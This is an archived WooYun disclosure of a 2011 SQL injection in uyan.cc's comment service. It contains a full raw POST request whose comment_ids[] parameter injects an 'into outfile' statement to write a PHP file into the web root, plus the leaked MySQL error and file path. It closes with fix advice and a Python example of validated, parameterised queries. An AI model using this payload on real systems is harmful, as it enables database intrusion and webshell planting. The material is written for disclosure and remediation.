WooYun (WooYun.org) historical vulnerability archive: http://wy.zone.ci/
WooYun Drops articles online: http://drop.zone.ci/
2011-10-21: Actively contacting the vendor and waiting for the vendor to claim the report; details are not disclosed publicly.
2011-10-21: The vendor has actively ignored the vulnerability; details are disclosed to the public.
http://uyan.cc is a newly founded startup providing community comment services; insufficient filtering of SQL input is what causes the vulnerability.
http://uyan.cc/index.php/youyan_content/getRepliesTogether/time does not filter the data submitted via POST. In addition, http://uyan.cc/index.php/youyan?title=%E5%9B%BD%E5%86%852%E4%BA%BA%E5%88%9B%E4%B8% leaks the file path. However, because the database is separated from the web server, obtaining a webshell directly with into outfile is difficult.
POST http://uyan.cc/index.php/youyan_content/getRepliesTogether/time HTTP/1.1
Host: uyan.cc
Connection: keep-alive
Content-Length: 723
Origin: http://uyan.cc
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Referer: http://uyan.cc/index.php/youyan?pageId=www.36kr.com_www.36kr.com%2F%3Fp%3D54654&domain=www.36kr.coma'%20&&%20'1'='2&master_id=2711%20&&%201=2&title=''''''-1&url=-1&pageImg=;%3C/javascript%3E&pageContent=-1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8,zh-CN;q=0.6
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=97ipt9bjm2otbd7j2cphg84444

comment_ids%5B%5D=168019&comment_ids%5B%5D=168031 and (select '11111' into outfile '//opt//lampstack-5.3.6-0//apache2//htdocs//controllers//1ssbbb.php' )=1&comment_ids%5B%5D=168020&comment_ids%5B%5D=168032&comment_ids%5B%5D=168007&comment_ids%5B%5D=168006&comment_ids%5B%5D=167967&comment_ids%5B%5D=167985&comment_ids%5B%5D=167986&comment_ids%5B%5D=167987&page=www.36kr.com_www.36kr.com%2F%3Fp%3D54654&delStyle=0&reply_page_no%5B167967%5D=0&reply_page_no%5B167985%5D=0&reply_page_no%5B167986%5D=0&reply_page_no%5B167987%5D=0&reply_page_no%5B168006%5D=0&reply_page_no%5B168007%5D=0&reply_page_no%5B168019%5D=0&reply_page_no%5B168020%5D=0&reply_page_no%5B168031%5D=0&reply_page_no%5B168032%5D=0&session_name=uyan_www.36kr.com
<body> <div id="content">
<h1>A Database Error Occurred</h1>
<p>Error Number: 1064</p>
<p>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1=1 order by comment.time desc limit 0, 3' at line 3</p>
<p>select user.*, comment.* from comment LEFT JOIN user ON user.user_id = comment.user_id where comment.del=0 and comment.reply_to_comment_id=168031 and '1=1 order by comment.time desc limit 0, 3</p>
<p>Filename: /opt/lampstack-5.3.6-0/apache2/htdocs/models/comment_model.php</p>
<p>Line Number: 251</p>
</div></body></html>
Filter user-submitted parameters, and suppress detailed error messages.
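An added illustration of that fix, not code from uyan.cc (the site runs PHP; this uses Python with an in-memory SQLite table and constructed rows): the failing query's comment id spliced into the SQL text, beside a version that allow-lists comment_ids[] as integers and binds the value, while the response carries only a generic status.

```python
import re
import sqlite3
# Constructed stand-in for the comment table in the failing query (not uyan.cc's real schema).
SAMPLE_COMMENTS = [
    (1, 168031, 0, 100, "first reply"),
    (2, 168031, 0, 101, "second reply"),
    (3, 168019, 0, 102, "reply in another thread"),
    (4, 168031, 1, 103, "deleted reply"),
]

class BadRequest(Exception):
    """Raised when a comment_ids[] element is not a plain integer."""

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("create table comment (comment_id int, reply_to_comment_id int, del int, time int, body text)")
    conn.executemany("insert into comment values (?, ?, ?, ?, ?)", SAMPLE_COMMENTS)
    return conn

def parse_comment_ids(values):
    # Allow-list check: every comment_ids[] element must be a bare decimal integer.
    ids = []
    for v in values:
        if not re.fullmatch(r"[0-9]{1,18}", v):
            raise BadRequest("comment_ids[] must be integers")
        ids.append(int(v))
    return ids

def replies_vulnerable(conn, raw_id):
    # Mirrors the query on the page: the raw parameter is spliced into the SQL text.
    sql = ("select * from comment where del=0 and reply_to_comment_id=" + raw_id
           + " and 1=1 order by time desc limit 0, 3")
    return conn.execute(sql).fetchall()

def replies_safe(conn, raw_id):
    # The validated integer is bound as a parameter, so its value cannot alter the query.
    (cid,) = parse_comment_ids([raw_id])
    sql = "select * from comment where del=0 and reply_to_comment_id=? order by time desc limit 0, 3"
    return conn.execute(sql, (cid,)).fetchall()

def handle_request(conn, raw_id):
    # Clients get a generic status; SQL text, file name and line number stay in the server log.
    try:
        return {"status": 200, "replies": replies_safe(conn, raw_id)}
    except BadRequest:
        return {"status": 400, "error": "bad request"}
    except sqlite3.Error as exc:
        print("server log:", exc)  # stand-in for the application's error log
        return {"status": 500, "error": "internal error"}
```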
Unable to contact the vendor, or the vendor actively declined.